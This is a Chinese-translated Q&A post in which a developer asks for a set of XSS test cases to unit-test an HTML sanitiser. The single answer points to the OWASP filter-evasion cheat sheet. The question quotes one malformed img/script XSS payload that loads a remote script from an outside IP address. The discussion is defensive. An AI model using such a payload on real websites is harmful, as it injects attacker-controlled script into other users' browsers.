testing - XSS 酷刑测试——它存在吗？

Question

我想写一个 html sanitiser，显然要测试/证明它是否正常工作，我需要一组 XSS 示例来对抗它以查看它的性能。这是一个 nice example from Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

我知道有一个 Mime Torture Test其中包含几封带有附件的嵌套电子邮件，用于测试 Mime 解码器(如果它们可以正确解码，则证明它们可以工作)。我基本上是在寻找 XSS 的等价物，即我可以扔到我的 sanitizer 中以确保它正常工作的狡猾 html 示例列表。

如果任何人也有关于如何编写 sanitizer 的任何好的资源(即人们尝试使用的常见漏洞利用等)，我们也将不胜感激。

提前致谢:-)

编辑:抱歉，如果之前不清楚，但我经过了一系列折磨测试，所以我可以为 sanitizer 编写单元测试，而不是在浏览器中测试它，等等。理论上的源数据可能已经到来从任何地方 - 不仅仅是浏览器。

Answer 1

看看这个 XSS 作弊列表:https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet